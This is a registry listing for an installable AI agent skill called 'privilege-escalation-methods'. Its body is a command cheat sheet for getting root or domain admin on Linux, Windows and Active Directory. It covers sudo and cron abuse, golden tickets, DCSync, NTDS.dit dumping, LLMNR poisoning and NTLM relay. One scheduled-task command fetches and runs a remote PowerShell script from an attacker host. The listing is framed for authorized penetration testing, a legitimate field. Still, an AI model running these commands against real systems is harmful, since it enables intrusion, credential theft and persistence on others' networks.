{"id":"a3ee14df-a408-44c8-b49d-4038e8e99544","shortId":"PqayHL","kind":"skill","title":"privilege-escalation-methods","tagline":"Provide comprehensive techniques for escalating privileges from a low-privileged user to root/administrator access on compromised Linux and Windows systems. Essential for penetration testing post-exploitation phase and red team operations.","description":"# Privilege Escalation Methods\n\n## Purpose\n\nProvide comprehensive techniques for escalating privileges from a low-privileged user to root/administrator access on compromised Linux and Windows systems. Essential for penetration testing post-exploitation phase and red team operations.\n\n## Inputs/Prerequisites\n\n- Initial low-privilege shell access on target system\n- Kali Linux or penetration testing distribution\n- Tools: Mimikatz, PowerView, PowerUpSQL, Responder, Impacket, Rubeus\n- Understanding of Windows/Linux privilege models\n- For AD attacks: Domain user credentials and network access to DC\n\n## Outputs/Deliverables\n\n- Root or Administrator shell access\n- Extracted credentials and hashes\n- Persistent access mechanisms\n- Domain compromise (for AD environments)\n\n---\n\n## Core Techniques\n\n### Linux Privilege Escalation\n\n#### 1. Abusing Sudo Binaries\n\nExploit misconfigured sudo permissions using GTFOBins techniques:\n\n```bash\n# Check sudo permissions\nsudo -l\n\n# Exploit common binaries\nsudo vim -c ':!/bin/bash'\nsudo find /etc/passwd -exec /bin/bash \\;\nsudo awk 'BEGIN {system(\"/bin/bash\")}'\nsudo python -c 'import pty;pty.spawn(\"/bin/bash\")'\nsudo perl -e 'exec \"/bin/bash\";'\nsudo less /etc/hosts    # then type: !bash\nsudo man man            # then type: !bash\nsudo env /bin/bash\n```\n\n#### 2. Abusing Scheduled Tasks (Cron)\n\n```bash\n# Find writable cron scripts\nls -la /etc/cron*\ncat /etc/crontab\n\n# Inject payload into writable script\necho 'chmod +s /bin/bash' > /home/user/systemupdate.sh\nchmod +x /home/user/systemupdate.sh\n\n# Wait for execution, then:\n/bin/bash -p\n```\n\n#### 3. Abusing Capabilities\n\n```bash\n# Find binaries with capabilities\ngetcap -r / 2>/dev/null\n\n# Python with cap_setuid\n/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system(\"/bin/bash\")'\n\n# Perl with cap_setuid\n/usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec \"/bin/bash\";'\n\n# Tar with cap_dac_read_search (read any file)\n/usr/bin/tar -cvf key.tar /root/.ssh/id_rsa\n/usr/bin/tar -xvf key.tar\n```\n\n#### 4. NFS Root Squashing\n\n```bash\n# Check for NFS shares\nshowmount -e <victim_ip>\n\n# Mount and exploit no_root_squash\nmkdir /tmp/mount\nmount -o rw,vers=2 <victim_ip>:/tmp /tmp/mount\ncd /tmp/mount\ncp /bin/bash .\nchmod +s bash\n```\n\n#### 5. MySQL Running as Root\n\n```bash\n# If MySQL runs as root\nmysql -u root -p\n\\! chmod +s /bin/bash\nexit\n/bin/bash -p\n```\n\n---\n\n### Windows Privilege Escalation\n\n#### 1. Token Impersonation\n\n```powershell\n# Using SweetPotato (SeImpersonatePrivilege)\nexecute-assembly sweetpotato.exe -p beacon.exe\n\n# Using SharpImpersonation\nSharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser\n```\n\n#### 2. Service Abuse\n\n```powershell\n# Using PowerUp\n. .\\PowerUp.ps1\nInvoke-ServiceAbuse -Name 'vds' -UserName 'domain\\user1'\nInvoke-ServiceAbuse -Name 'browser' -UserName 'domain\\user1'\n```\n\n#### 3. Abusing SeBackupPrivilege\n\n```powershell\nimport-module .\\SeBackupPrivilegeUtils.dll\nimport-module .\\SeBackupPrivilegeCmdLets.dll\nCopy-FileSebackupPrivilege z:\\Windows\\NTDS\\ntds.dit C:\\temp\\ntds.dit\n```\n\n#### 4. Abusing SeLoadDriverPrivilege\n\n```powershell\n# Load vulnerable Capcom driver\n.\\eoploaddriver.exe System\\CurrentControlSet\\MyService C:\\test\\capcom.sys\n.\\ExploitCapcom.exe\n```\n\n#### 5. Abusing GPO\n\n```powershell\n.\\SharpGPOAbuse.exe --AddComputerTask --Taskname \"Update\" `\n  --Author DOMAIN\\<USER> --Command \"cmd.exe\" `\n  --Arguments \"/c net user Administrator Password!@# /domain\" `\n  --GPOName \"ADDITIONAL DC CONFIGURATION\"\n```\n\n---\n\n### Active Directory Attacks\n\n#### 1. Kerberoasting\n\n```bash\n# Using Impacket\nGetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.100 -request\n\n# Using CrackMapExec\ncrackmapexec ldap 10.0.2.11 -u 'user' -p 'pass' --kdcHost 10.0.2.11 --kerberoast output.txt\n```\n\n#### 2. AS-REP Roasting\n\n```powershell\n.\\Rubeus.exe asreproast\n```\n\n#### 3. Golden Ticket\n\n```powershell\n# DCSync to get krbtgt hash\nmimikatz# lsadump::dcsync /user:krbtgt\n\n# Create golden ticket\nmimikatz# kerberos::golden /user:Administrator /domain:domain.local `\n  /sid:S-1-5-21-... /rc4:<NTLM_HASH> /id:500\n```\n\n#### 4. Pass-the-Ticket\n\n```powershell\n.\\Rubeus.exe asktgt /user:USER$ /rc4:<NTLM_HASH> /ptt\nklist  # Verify ticket\n```\n\n#### 5. Golden Ticket with Scheduled Tasks\n\n```powershell\n# 1. Elevate and dump credentials\nmimikatz# token::elevate\nmimikatz# vault::cred /patch\nmimikatz# lsadump::lsa /patch\n\n# 2. Create golden ticket\nmimikatz# kerberos::golden /user:Administrator /rc4:<HASH> `\n  /domain:DOMAIN /sid:<SID> /ticket:ticket.kirbi\n\n# 3. Create scheduled task\nschtasks /create /S DOMAIN /SC Weekly /RU \"NT Authority\\SYSTEM\" `\n  /TN \"enterprise\" /TR \"powershell.exe -c 'iex (iwr http://attacker/shell.ps1)'\"\nschtasks /run /s DOMAIN /TN \"enterprise\"\n```\n\n---\n\n### Credential Harvesting\n\n#### LLMNR Poisoning\n\n```bash\n# Start Responder\nresponder -I eth1 -v\n\n# Create malicious shortcut (Book.url)\n[InternetShortcut]\nURL=https://facebook.com\nIconIndex=0\nIconFile=\\\\attacker_ip\\not_found.ico\n```\n\n#### NTLM Relay\n\n```bash\nresponder -I eth1 -v\nntlmrelayx.py -tf targets.txt -smb2support\n```\n\n#### Dumping with VSS\n\n```powershell\nvssadmin create shadow /for=C:\ncopy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\NTDS.dit C:\\temp\\\ncopy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SYSTEM C:\\temp\\\n```\n\n---\n\n## Quick Reference\n\n| Technique | OS | Domain Required | Tool |\n|-----------|-----|-----------------|------|\n| Sudo Binary Abuse | Linux | No | GTFOBins |\n| Cron Job Exploit | Linux | No | Manual |\n| Capability Abuse | Linux | No | getcap |\n| NFS no_root_squash | Linux | No | mount |\n| Token Impersonation | Windows | No | SweetPotato |\n| Service Abuse | Windows | No | PowerUp |\n| Kerberoasting | Windows | Yes | Rubeus/Impacket |\n| AS-REP Roasting | Windows | Yes | Rubeus |\n| Golden Ticket | Windows | Yes | Mimikatz |\n| Pass-the-Ticket | Windows | Yes | Rubeus |\n| DCSync | Windows | Yes | Mimikatz |\n| LLMNR Poisoning | Windows | Yes | Responder |\n\n---\n\n## Constraints\n\n**Must:**\n- Have initial shell access before attempting escalation\n- Verify target OS and environment before selecting technique\n- Use appropriate tool for domain vs local escalation\n\n**Must Not:**\n- Attempt techniques on production systems without authorization\n- Leave persistence mechanisms without client approval\n- Ignore detection mechanisms (EDR, SIEM)\n\n**Should:**\n- Enumerate thoroughly before exploitation\n- Document all successful escalation paths\n- Clean up artifacts after engagement\n\n---\n\n## Examples\n\n### Example 1: Linux Sudo to Root\n\n```bash\n# Check sudo permissions\n$ sudo -l\nUser www-data may run the following commands:\n    (root) NOPASSWD: /usr/bin/vim\n\n# Exploit vim\n$ sudo vim -c ':!/bin/bash'\nroot@target:~# id\nuid=0(root) gid=0(root) groups=0(root)\n```\n\n### Example 2: Windows Kerberoasting\n\n```bash\n# Request service tickets\n$ GetUserSPNs.py domain.local/jsmith:Password123 -dc-ip 10.10.10.1 -request\n\n# Crack with hashcat\n$ hashcat -m 13100 hashes.txt rockyou.txt\n```\n\n---\n\n## Troubleshooting\n\n| Issue | Solution |\n|-------|----------|\n| sudo -l requires password | Try other enumeration (SUID, cron, capabilities) |\n| Mimikatz blocked by AV | Use Invoke-Mimikatz or SafetyKatz |\n| Kerberoasting returns no hashes | Check for service accounts with SPNs |\n| Token impersonation fails | Verify SeImpersonatePrivilege is present |\n| NFS mount fails | Check NFS version compatibility (vers=2,3,4) |\n\n---\n\n## Additional Resources\n\nFor detailed enumeration scripts, use:\n- **LinPEAS**: Linux privilege escalation enumeration\n- **WinPEAS**: Windows privilege escalation enumeration\n- **BloodHound**: Active Directory attack path mapping\n- **GTFOBins**: Unix binary exploitation reference\n\n## When to Use\nThis skill is applicable to execute the workflow or actions described in the overview.","tags":["privilege","escalation","methods","antigravity","awesome","skills","sickn33","agent-skills","agentic-skills","ai-agent-skills","ai-agents","ai-coding"],"capabilities":["skill","source-sickn33","skill-privilege-escalation-methods","topic-agent-skills","topic-agentic-skills","topic-ai-agent-skills","topic-ai-agents","topic-ai-coding","topic-ai-workflows","topic-antigravity","topic-antigravity-skills","topic-claude-code","topic-claude-code-skills","topic-codex-cli","topic-codex-skills"],"categories":["antigravity-awesome-skills"],"synonyms":[],"warnings":[],"endpointUrl":"https://skills.sh/sickn33/antigravity-awesome-skills/privilege-escalation-methods","protocol":"skill","transport":"skills-sh","auth":{"type":"none","details":{"cli":"npx skills add sickn33/antigravity-awesome-skills","source_repo":"https://github.com/sickn33/antigravity-awesome-skills","install_from":"skills.sh"}},"qualityScore":"0.700","qualityRationale":"deterministic score 0.70 from registry signals: · indexed on github topic:agent-skills · 34616 github stars · SKILL.md body (7,791 chars)","verified":false,"liveness":"unknown","lastLivenessCheck":null,"agentReviews":{"count":0,"score_avg":null,"cost_usd_avg":null,"success_rate":null,"latency_p50_ms":null,"narrative_summary":null,"summary_updated_at":null},"enrichmentModel":"deterministic:skill-github:v1","enrichmentVersion":1,"enrichedAt":"2026-04-23T00:51:25.193Z","embedding":null,"createdAt":"2026-04-18T21:42:43.302Z","updatedAt":"2026-04-23T00:51:25.193Z","lastSeenAt":"2026-04-23T00:51:25.193Z","tsv":"'-1':510 '-21':512 '-5':511 '/bin/bash':160,165,170,177,182,197,221,230,255,269,315,336,338,823 '/c':436 '/create':574 '/dev/null':243 '/domain':441,506,564 '/etc/cron':210 '/etc/crontab':212 '/etc/hosts':185 '/etc/passwd':163 '/for':639 '/home/user/systemupdate.sh':222,225 '/id':514 '/jsmith:password123':847 '/patch':549,553 '/ptt':527 '/rc4':513,526,563 '/root/.ssh/id_rsa':282 '/ru':579 '/run':592 '/s':575,593 '/sc':577 '/sid':508,566 '/ticket':567 '/tmp':310 '/tmp/mount':304,311,313 '/tn':583,595 '/tr':585 '/user':496,504,524,561 '/user:password':457 '/usr/bin/perl':260 '/usr/bin/python2.6':248 '/usr/bin/tar':279,283 '/usr/bin/vim':817 '0':253,267,616,828,831,834 '1':137,343,449,538,795 '10.0.2.11':467,473 '10.10.10.1':851 '10.10.10.100':461 '13100':858 '2':198,242,309,362,476,554,837,909 '3':232,385,484,569,910 '4':286,407,516,911 '5':319,423,531 '500':515 'abus':138,199,233,364,386,408,424,669,680,697 'access':19,56,81,111,119,125,738 'account':891 'action':952 'activ':446,930 'ad':104,130 'addcomputertask':428 'addit':443,912 'administr':117,439,505,562 'applic':946 'appropri':751 'approv':772 'argument':435 'artifact':790 'as-rep':477,705 'asktgt':523 'asreproast':483 'assembl':352 'attack':105,448,618,932 'attacker/shell.ps1':590 'attempt':740,760 'author':431,581,766 'av':877 'awk':167 'bash':148,188,194,203,235,290,318,324,451,601,623,800,840 'beacon.exe':355 'begin':168 'binari':140,156,237,668,937 'block':875 'bloodhound':929 'book.url':611 'browser':381 'c':159,173,249,404,419,587,640,648,658,822 'cap':246,258,272 'capabl':234,239,679,873 'capcom':413 'capcom.sys':421 'cat':211 'cd':312 'check':149,291,801,888,904 'chmod':219,223,316,334 'clean':788 'client':771 'cmd.exe':434 'command':433,814 'common':155 'compat':907 'comprehens':6,43 'compromis':21,58,128 'config':656 'configur':445 'constraint':733 'copi':398,641,650 'copy-filesebackupprivileg':397 'core':132 'cp':314 'crack':853 'crackmapexec':464,465 'creat':498,555,570,608,637 'cred':548 'credenti':108,121,542,597 'cron':202,206,673,872 'currentcontrolset':417 'cvf':280 'dac':273 'data':809 'dc':113,444,459,849 'dc-ip':458,848 'dcsync':488,495,724 'describ':953 'detail':915 'detect':774 'devic':643,652 'directori':447,931 'distribut':90 'document':783 'domain':106,127,375,383,432,565,576,594,664,754 'domain.local':456,507,846 'domain.local/jsmith:password123':845 'domain.local/user:password':455 'driver':414 'dump':541,632 'e':180,261,296 'echo':218 'edr':776 'elev':539,545 'engag':792 'enterpris':584,596 'enumer':779,870,916,923,928 'env':196 'environ':131,746 'eoploaddriver.exe':415 'escal':3,9,39,46,136,342,741,757,786,922,927 'essenti':26,63 'eth1':606,626 'exampl':793,794,836 'exec':164,181,268 'execut':228,351,948 'execute-assembl':350 'exit':337 'exploit':32,69,141,154,299,675,782,818,938 'exploitcapcom.exe':422 'extract':120 'facebook.com':614 'fail':896,903 'file':278 'filesebackupprivileg':399 'find':162,204,236 'follow':813 'get':490 'getcap':240,683 'getuserspns.py':454,844 'gid':830 'globalroot':642,651 'golden':485,499,503,532,556,560,712 'gpo':425 'gponam':442 'group':833 'gtfobin':146,672,935 'harddiskvolumeshadowcopy1':644,653 'harvest':598 'hash':123,492,887 'hashcat':855,856 'hashes.txt':859 'iconfil':617 'iconindex':615 'id':826 'iex':588 'ignor':773 'impacket':96,453 'imperson':345,692,895 'impersonateloggedonus':361 'import':174,250,390,394 'import-modul':389,393 'initi':76,736 'inject':213 'inputs/prerequisites':75 'internetshortcut':612 'invok':370,378,880 'invoke-mimikatz':879 'invoke-serviceabus':369,377 'ip':460,619,850 'issu':862 'iwr':589 'job':674 'kali':85 'kdchost':472 'kerbero':502,559 'kerberoast':450,474,701,839,884 'key.tar':281,285 'klist':528 'krbtgt':491,497 'l':153,805,865 'la':209 'ldap':466 'leav':767 'less':184 'linpea':919 'linux':22,59,86,134,670,676,681,688,796,920 'llmnr':599,728 'load':411 'local':756 'low':14,51,78 'low-privileg':13,50,77 'ls':208 'lsa':552 'lsadump':494,551 'm':857 'malici':609 'man':190,191 'manual':678 'map':934 'may':810 'mechan':126,769,775 'method':4,40 'mimikatz':92,493,501,543,546,550,558,716,727,874,881 'misconfigur':142 'mkdir':303 'model':102 'modul':391,395 'mount':297,305,690,902 'must':734,758 'myservic':418 'mysql':320,326,330 'name':372,380 'net':437 'network':110 'nfs':287,293,684,901,905 'nopasswd':816 'not_found.ico':620 'nt':580 'ntds':402,646 'ntds.dit':403,406,647 'ntlm':621 'ntlmrelayx.py':628 'o':306 'oper':37,74 'os':251,663,744 'os.setuid':252 'os.system':254 'output.txt':475 'outputs/deliverables':114 'overview':956 'p':231,333,339,354,470 'pass':471,518,718 'pass-the-ticket':517,717 'password':440,867 'path':787,933 'payload':214 'penetr':28,65,88 'perl':179,256 'permiss':144,151,803 'persist':124,768 'phase':33,70 'poison':600,729 'posix':263,265 'post':31,68 'post-exploit':30,67 'powershel':346,365,388,410,426,481,487,521,537,635 'powershell.exe':586 'powerup':367,700 'powerup.ps1':368 'powerupsql':94 'powerview':93 'present':900 'privileg':2,10,15,38,47,52,79,101,135,341,921,926 'privilege-escalation-method':1 'product':763 'provid':5,42 'pti':175 'pty.spawn':176 'purpos':41 'python':172,244 'quick':660 'r':241 'read':274,276 'red':35,72 'refer':661,939 'relay':622 'rep':479,707 'request':462,841,852 'requir':665,866 'resourc':913 'respond':95,603,604,624,732 'return':885 'roast':480,708 'rockyou.txt':860 'root':115,288,301,323,329,332,686,799,815,824,829,832,835 'root/administrator':18,55 'rubeus':97,711,723 'rubeus.exe':482,522 'rubeus/impacket':704 'run':321,327,811 'rw':307 'safetykatz':883 'schedul':200,535,571 'schtask':573,591 'script':207,217,917 'search':275 'sebackupprivileg':387 'sebackupprivilegecmdlets.dll':396 'sebackupprivilegeutils.dll':392 'seimpersonateprivileg':349,898 'select':748 'seloaddriverprivileg':409 'servic':363,696,842,890 'serviceabus':371,379 'setuid':247,259,264,266 'shadow':638 'share':294 'sharpgpoabuse.exe':427 'sharpimperson':357 'sharpimpersonation.exe':358 'shell':80,118,737 'shortcut':610 'showmount':295 'siem':777 'skill':944 'skill-privilege-escalation-methods' 'smb2support':631 'solut':863 'source-sickn33' 'spns':893 'squash':289,302,687 'start':602 'success':785 'sudo':139,143,150,152,157,161,166,171,178,183,189,195,667,797,802,804,820,864 'suid':871 'sweetpotato':348,695 'sweetpotato.exe':353 'system':25,62,84,169,416,582,657,764 'system32':655 'tar':270 'target':83,743,825 'targets.txt':630 'task':201,536,572 'tasknam':429 'team':36,73 'techniqu':7,44,133,147,360,662,749,761 'temp':405,649,659 'test':29,66,89,420 'tf':629 'thorough':780 'ticket':486,500,520,530,533,557,713,720,843 'ticket.kirbi':568 'token':344,544,691,894 'tool':91,666,752 'topic-agent-skills' 'topic-agentic-skills' 'topic-ai-agent-skills' 'topic-ai-agents' 'topic-ai-coding' 'topic-ai-workflows' 'topic-antigravity' 'topic-antigravity-skills' 'topic-claude-code' 'topic-claude-code-skills' 'topic-codex-cli' 'topic-codex-skills' 'tri':868 'troubleshoot':861 'type':187,193 'u':331,468 'uid':827 'understand':98 'unix':936 'updat':430 'url':613 'use':145,262,347,356,366,452,463,750,878,918,942 'user':16,53,107,359,438,469,525,806 'user1':376,384 'usernam':374,382 'v':607,627 'vault':547 'vds':373 'ver':308,908 'verifi':529,742,897 'version':906 'vim':158,819,821 'vs':755 'vss':634 'vssadmin':636 'vulner':412 'wait':226 'week':578 'window':24,61,340,401,645,654,693,698,702,709,714,721,725,730,838,925 'windows/linux':100 'winpea':924 'without':765,770 'workflow':950 'writabl':205,216 'www':808 'www-data':807 'x':224 'xvf':284 'yes':703,710,715,722,726,731 'z':400","prices":[{"id":"88bd77f0-15ae-4087-a1c9-e8d0fbd7bef5","listingId":"a3ee14df-a408-44c8-b49d-4038e8e99544","amountUsd":"0","unit":"free","nativeCurrency":null,"nativeAmount":null,"chain":null,"payTo":null,"paymentMethod":"skill-free","isPrimary":true,"details":{"org":"sickn33","category":"antigravity-awesome-skills","install_from":"skills.sh"},"createdAt":"2026-04-18T21:42:43.302Z"}],"sources":[{"listingId":"a3ee14df-a408-44c8-b49d-4038e8e99544","source":"github","sourceId":"sickn33/antigravity-awesome-skills/privilege-escalation-methods","sourceUrl":"https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/privilege-escalation-methods","isPrimary":false,"firstSeenAt":"2026-04-18T21:42:43.302Z","lastSeenAt":"2026-04-23T00:51:25.193Z"}],"details":{"listingId":"a3ee14df-a408-44c8-b49d-4038e8e99544","quickStartSnippet":null,"exampleRequest":null,"exampleResponse":null,"schema":null,"openapiUrl":null,"agentsTxtUrl":null,"citations":[],"useCases":[],"bestFor":[],"notFor":[],"kindDetails":{"org":"sickn33","slug":"privilege-escalation-methods","github":{"repo":"sickn33/antigravity-awesome-skills","stars":34616,"topics":["agent-skills","agentic-skills","ai-agent-skills","ai-agents","ai-coding","ai-workflows","antigravity","antigravity-skills","claude-code","claude-code-skills","codex-cli","codex-skills","cursor","cursor-skills","developer-tools","gemini-cli","gemini-skills","kiro","mcp","skill-library"],"license":"mit","html_url":"https://github.com/sickn33/antigravity-awesome-skills","pushed_at":"2026-04-22T06:40:00Z","description":"Installable GitHub library of 1,400+ agentic skills for Claude Code, Cursor, Codex CLI, Gemini CLI, Antigravity, and more. Includes installer CLI, bundles, workflows, and official/community skill collections.","skill_md_sha":"75fad215dd94a536474ffe690c23f02138f24b46","skill_md_path":"skills/privilege-escalation-methods/SKILL.md","default_branch":"main","skill_tree_url":"https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/privilege-escalation-methods"},"layout":"multi","source":"github","category":"antigravity-awesome-skills","frontmatter":{"name":"privilege-escalation-methods","description":"Provide comprehensive techniques for escalating privileges from a low-privileged user to root/administrator access on compromised Linux and Windows systems. Essential for penetration testing post-exploitation phase and red team operations."},"skills_sh_url":"https://skills.sh/sickn33/antigravity-awesome-skills/privilege-escalation-methods"},"updatedAt":"2026-04-23T00:51:25.193Z"}}